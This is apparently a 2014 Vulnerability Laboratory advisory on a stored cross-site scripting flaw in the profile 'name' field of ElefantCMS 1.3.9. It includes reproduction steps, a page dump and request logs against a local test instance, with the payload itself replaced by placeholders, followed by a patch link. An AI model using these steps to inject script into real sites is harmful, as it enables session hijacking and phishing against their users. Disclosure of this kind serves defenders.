Document Title:
===============
Elefant CMS v1.3.9 - Persistent Name Update Vulnerability


References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1365


Release Date:
=============
2014-12-03


Vulnerability Laboratory ID (VL-ID):
====================================
1365


Common Vulnerability Scoring System:
====================================
3.9


Product & Service Introduction:
===============================
Elefant provides a modern, minimalist user interface that eliminates clutter and confusion, with a site editor that gets out 
of your way and is a pleasure to use. You`ll notice right away the attention to detail throughout the software. Elefant takes 
the best WYSIWYG editor in the world, and makes it better through deep integration with your content. With Elefant`s dynamic 
objects plugin, you can embed dozens of types of dynamic content anywhere on your site, things like videos, event calendars, 
contact forms, social media integration, photo galleries and slideshows, member login, payment buttons, you name it.

(Copy of the Vendor Homepage: https://elefantcms.com/ )


Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered an application-side input validation web vulnerability in the official ElefantCMS v1.3.9 web-application.


Vulnerability Disclosure Timeline:
==================================
2014-12-03:	Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Affected Product(s):
====================
Github
Product: ElefantCMS - Web Application 1.3.9


Exploitation Technique:
=======================
Remote


Severity Level:
===============
Medium


Technical Details & Description:
================================
A persistent input validation web vulnerability has been discovered in the official ElefantCMS v1.3.9 web-application.
The vulnerability allows remote attackers to inject malicious script codes on the application-side of the vulnerable service.

The vulnerability is located in the user `name` value of the profile module. Remote attackers are able to inject own persistent 
script code in the user profile module. The POST method inject runs through the /user/update module and the execution of the payload 
occurs in the ./user profile page. The attack vector of the vulnerability is located on the application-side and the request method 
to inject malicious codes is POST.

The security risk of the persistent vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 3.9.
Exploitation of the persistent security vulnerability requires a low privileged web-application user account and low user interaction. 
Successful exploitation of the vulnerabilities result in persistent phishing attacks, persistent session hijacking attacks, persistent 
external redirect to malicious sources and application-side manipulation of affected or connected module context.  

Request Method(s):
				[+] POST

Vulnerable Module(s):
				[+] http://elefantcms.127.0.0.1:8080/user/update


Vulnerable Parameter(s):
				[+] name

Affected Module(s):
				[+] http://elefantcms.127.0.0.1:8080/user


Proof of Concept (PoC):
=======================
The persistent input validation web vulnerability can be exploited by remote attackers with low user interaction (click).
For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.

Manual steps to reproduce the vulnerability ...

1. Install the elefeantcms application and open the frontend
2. Register an user account and save the random settings
3. Do to the ./user page to update the users profile
4. Inject own script code as payload to the vulnerable name input field. Save the settings
5. The execution occurs in the profile page of the user that is visible to the admin or other users
6. Successful reproduce of the vulnerability!


PoC: ./user

<html><head>
	<title>Your Site Name - "><TEST") <</title>
	<meta charset="UTF-8">
	<link rel="stylesheet" href="http://fonts.googleapis.com/css?family=Roboto:400,300">
			<link rel="stylesheet" type="text/css" href="/css/960_compiled.css">
		<link rel="stylesheet" type="text/css" href="/css/style.css">
		<script src="/js/jquery-1.8.3.min.js"></script>
<link rel="stylesheet" href="/apps/admin/css/jquery.jgrowl.css">
<link rel="stylesheet" href="/apps/admin/css/top-bar.css">
<script>$(function(){$.elefant_version='1.3.3';});</script><script src="/apps/admin/js/jquery.jgrowl.min.js"></script>
<script src="/js/jquery.cookie.js"></script>
<script src="/apps/admin/js/top-bar.js"></script>
	</head>
<body>
<div id="wrapper" class="container_12">
	<div id="reset-notice" class="grid_12">
		<p align="center"><strong>Demo Notice: This site resets itself every hour on the hour.</strong>
		<br>
		<a href="http://www.elefantcms.com/download">Download Elefant</a>
		 | 
		<a href="https://affiliates.arvixe.com/track.php?id=3618&url=393">Elefant web hosting</a>
		<!--  | 
		<a href="https://phpfog.com/?a_aid=18859164">Elefant cloud hosting</a> -->
		 | 
		<a href="http://www.dotblock.com/vps_hosting_stacks/elefantcms_vps_stack.php">Elefant VPS hosting</a>
		</p>	</div>
	<div id="head" class="grid_12">
		<div class="grid_6 alpha">
			<h1><a href="/">Your Site Name</a></h1>
		</div>
		<div class="grid_6 omega menu">
			<ul><li><a href="/index">Home</a></li>
</ul>		</div>
	</div>
	<div class="clear"></div>
	<div id="body" class="grid_8">
<h2>"><[PERSISTENT SCRIPT CODE EXECUTION VULNERABILITY!];)" <<="" h2=""><p><a href="http://www.gravatar.com/site/login/" 
target="_blank" title="Klicken Sie um das Foto zu aktualisieren (Gravatar)">
<img src="http://www.gravatar.com/avatar/43fa13578c4b764f6754d7dae507e963?s=42&d=mm" style="float: left; margin-right: 15px" /></a>
<a href="/user/update">Profil bearbeiten</a>
</p>
<br clear="both" />
	</div>


--- PoC Session Logs [POST] ---
Status: 200[OK]
 POST http://elefantcms.127.0.0.1:8080/user/update Load Flags[LOAD_DOCUMENT_URI  LOAD_INITIAL_DOCUMENT_URI  ] Größe des Inhalts[1531] Mime Type[text/html]
   Request Header:
      Host[elefantcms.127.0.0.1:8080]
      User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0]
      Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
      Accept-Language[de,en-US;q=0.7,en;q=0.3]
      Accept-Encoding[gzip, deflate]
      Referer[http://elefantcms.127.0.0.1:8080/user/update]
      Cookie[PHPSESSID=m1lkc0d1icld38qr9060loj5h6; elefant_update_checked=1; __utma=29033641.1115304499.1417521358.1417521358.1417521358.1; __utmb=29033641.7.10.1417521358; __utmc=29033641; __utmz=29033641.1417521358.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmt=1]
      Connection[keep-alive]
   POST-Daten:
      name[%22%3E%3C[PERSISTENT INJECTED SCRIPT CODE!]+%3C]
      email[rpknilst%40elefantcms.127.0.0.1:8080]
      password[]
      verify_pass[]
      _token_[761ecc8f6422453154062fae2a9a1396]
   Response Header:
      Date[Tue, 02 Dec 2014 11:56:53 GMT]
      Server[Apache]
      X-Powered-By[PHP/5.3.3]
      Expires[Thu, 19 Nov 1981 08:52:00 GMT]
      Cache-Control[no-store, no-cache, must-revalidate, post-check=0, pre-check=0]
      Pragma[no-cache]
      Content-Encoding[gzip]
      Vary[Accept-Encoding]
      Content-Length[1531]
      Keep-Alive[timeout=20, max=79]
      Connection[Keep-Alive]
      Content-Type[text/html; charset=UTF-8]




Status: 200[OK] 
GET http://elefantcms.127.0.0.1:8080/user Load Flags[LOAD_DOCUMENT_URI  LOAD_INITIAL_DOCUMENT_URI  ] Größe des Inhalts[1611] Mime Type[text/html]
   Request Header:
      Host[elefantcms.127.0.0.1:8080]
      User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0]
      Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
      Accept-Language[de,en-US;q=0.7,en;q=0.3]
      Accept-Encoding[gzip, deflate]
      Referer[http://elefantcms.127.0.0.1:8080/user/update]
      Cookie[PHPSESSID=m1lkc0d1icld38qr9060loj5h6; elefant_update_checked=1; __utma=29033641.1115304499.1417521358.1417521358.1417521358.1; __utmb=29033641.8.10.1417521358; __utmc=29033641; __utmz=29033641.1417521358.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmt=1]
      Connection[keep-alive]
   Response Header:
      Date[Tue, 02 Dec 2014 11:56:55 GMT]
      Server[Apache]
      X-Powered-By[PHP/5.3.3]
      Expires[Thu, 19 Nov 1981 08:52:00 GMT]
      Cache-Control[no-store, no-cache, must-revalidate, post-check=0, pre-check=0]
      Pragma[no-cache]
      Content-Encoding[gzip]
      Vary[Accept-Encoding]
      Content-Length[1611]
      Keep-Alive[timeout=20, max=77]
      Connection[Keep-Alive]
      Content-Type[text/html; charset=UTF-8]


Status: 200[OK] 
GET http://elefantcms.127.0.0.1:8080/[PERSISTENT SCRIPT CODE EXECUTION!] Load Flags[LOAD_DOCUMENT_URI  ] Größe des Inhalts[1483] Mime Type[text/html]
   Request Header:
      Host[elefantcms.127.0.0.1:8080]
      User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0]
      Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
      Accept-Language[de,en-US;q=0.7,en;q=0.3]
      Accept-Encoding[gzip, deflate]
      Referer[http://elefantcms.127.0.0.1:8080/user]
      Cookie[PHPSESSID=m1lkc0d1icld38qr9060loj5h6; elefant_update_checked=1; __utma=29033641.1115304499.1417521358.1417521358.1417521358.1; __utmb=29033641.8.10.1417521358; __utmc=29033641; __utmz=29033641.1417521358.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmt=1]
      Connection[keep-alive]
   Response Header:
      Date[Tue, 02 Dec 2014 11:56:55 GMT]
      Server[Apache]
      X-Powered-By[PHP/5.3.3]
      Expires[Thu, 19 Nov 1981 08:52:00 GMT]
      Cache-Control[no-store, no-cache, must-revalidate, post-check=0, pre-check=0]
      Pragma[no-cache]
      Content-Encoding[gzip]
      Vary[Accept-Encoding]
      Content-Length[1483]
      Keep-Alive[timeout=20, max=76]
      Connection[Keep-Alive]
      Content-Type[text/html; charset=UTF-8]


Reference(s):
http://elefantcms.127.0.0.1:8080/user
http://elefantcms.127.0.0.1:8080/user/update


Solution - Fix & Patch:
=======================
The vulnerability can be patched by a secure parse and encode of the vulnerable name value in the user/update POST method request.
Restrict the input field with the vulnerable name value and encode the vulnerable profile context output page to prevent persistent script code execution.

https://github.com/jbroadway/elefant/commit/5784b27e6dbd6ad4f68724f9ee1be376a40dd971
https://github.com/jbroadway/elefant/releases/tag/elefant_1_3_10_beta
https://www.elefantcms.com/download


Security Risk:
==============
The security risk of the application-side input validation vulnerability in the user profile module is estimated as medium. (3.9)


Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed 
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable 
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab 
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for 
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, 
policies, deface websites, hack into databases or trade with fraud/stolen material.

Domains:    www.vulnerability-lab.com   	- www.vuln-lab.com			       		- www.evolution-sec.com
Contact:    admin@vulnerability-lab.com 	- research@vulnerability-lab.com 	       		- admin@evolution-sec.com
Section:    magazine.vulnerability-db.com	- vulnerability-lab.com/contact.php		       	- evolution-sec.com/contact
Social:	    twitter.com/#!/vuln_lab 		- facebook.com/VulnerabilityLab 	       		- youtube.com/user/vulnerability0lab
Feeds:	    vulnerability-lab.com/rss/rss.php	- vulnerability-lab.com/rss/rss_upcoming.php   		- vulnerability-lab.com/rss/rss_news.php
Programs:   vulnerability-lab.com/submit.php  	- vulnerability-lab.com/list-of-bug-bounty-programs.php	- vulnerability-lab.com/register/

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to 
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by 
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website 
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact 
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.

				Copyright © 2014 | Vulnerability Laboratory - [Evolution Security GmbH]™



-- 
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com
PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt